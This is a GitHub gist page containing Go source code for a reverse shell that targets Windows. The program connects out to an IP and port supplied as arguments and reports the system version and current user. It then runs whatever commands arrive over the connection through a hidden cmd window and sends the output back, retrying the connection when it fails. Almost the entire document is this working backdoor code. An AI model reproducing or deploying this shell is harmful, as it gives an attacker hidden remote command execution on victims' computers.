Created
December 1, 2017 20:54
-
-
Save dnutiu/16fcabc26b0279d4266bb1b0d46c7c6b to your computer and use it in GitHub Desktop.
A simple reverse shell written in Go, may not work.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Reverse shell in go | |
| package main | |
| import ( | |
| "bufio" | |
| "flag" | |
| "fmt" | |
| "io" | |
| "net" | |
| "os" | |
| "os/exec" | |
| "strings" | |
| "sync" | |
| "syscall" | |
| "time" | |
| ) | |
| var ip string | |
| var port string | |
| var wg sync.WaitGroup | |
| var connection net.Conn | |
| func execCmd(instr string) { | |
| cmd := exec.Command("cmd", "/C", instr) | |
| cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} | |
| out, err := cmd.Output() | |
| if err == nil { | |
| connection.Write(out) | |
| } else { | |
| io.WriteString(connection, err.Error()) | |
| } | |
| } | |
| func startShell() { | |
| connection, err := net.Dial("tcp", fmt.Sprintf("%s:%s", ip, port)) | |
| if err != nil { | |
| println(err.Error()) | |
| time.Sleep(10 * time.Minute) | |
| wg.Done() | |
| initShell() | |
| } | |
| time.Sleep(1 * time.Second) | |
| version, _ := exec.Command("cmd", "/C", "ver").Output() | |
| connection.Write(version) | |
| io.WriteString(connection, "\n") | |
| whoami, _ := exec.Command("cmd", "/C", "whoami").Output() | |
| connection.Write(whoami) | |
| io.WriteString(connection, "\n") | |
| for { | |
| instruction, _ := bufio.NewReader(connection).ReadString('\n') | |
| command := strings.Fields(instruction) | |
| switch command[0] { | |
| case "cd": | |
| { | |
| err := os.Chdir(command[1]) | |
| if err != nil { | |
| io.WriteString(connection, err.Error()) | |
| } | |
| } | |
| case "exit": | |
| { | |
| connection.Close() | |
| os.Exit(0) | |
| } | |
| default: | |
| execCmd(instruction) | |
| } | |
| execCmd("pwd") | |
| } | |
| io.WriteString(connection, "Connection Lost!") | |
| wg.Done() | |
| } | |
| func initShell() { | |
| wg.Add(1) | |
| go startShell() | |
| wg.Wait() | |
| } | |
| func main() { | |
| flag.Parse() | |
| ip = flag.Arg(0) | |
| port = flag.Arg(1) | |
| initShell() | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment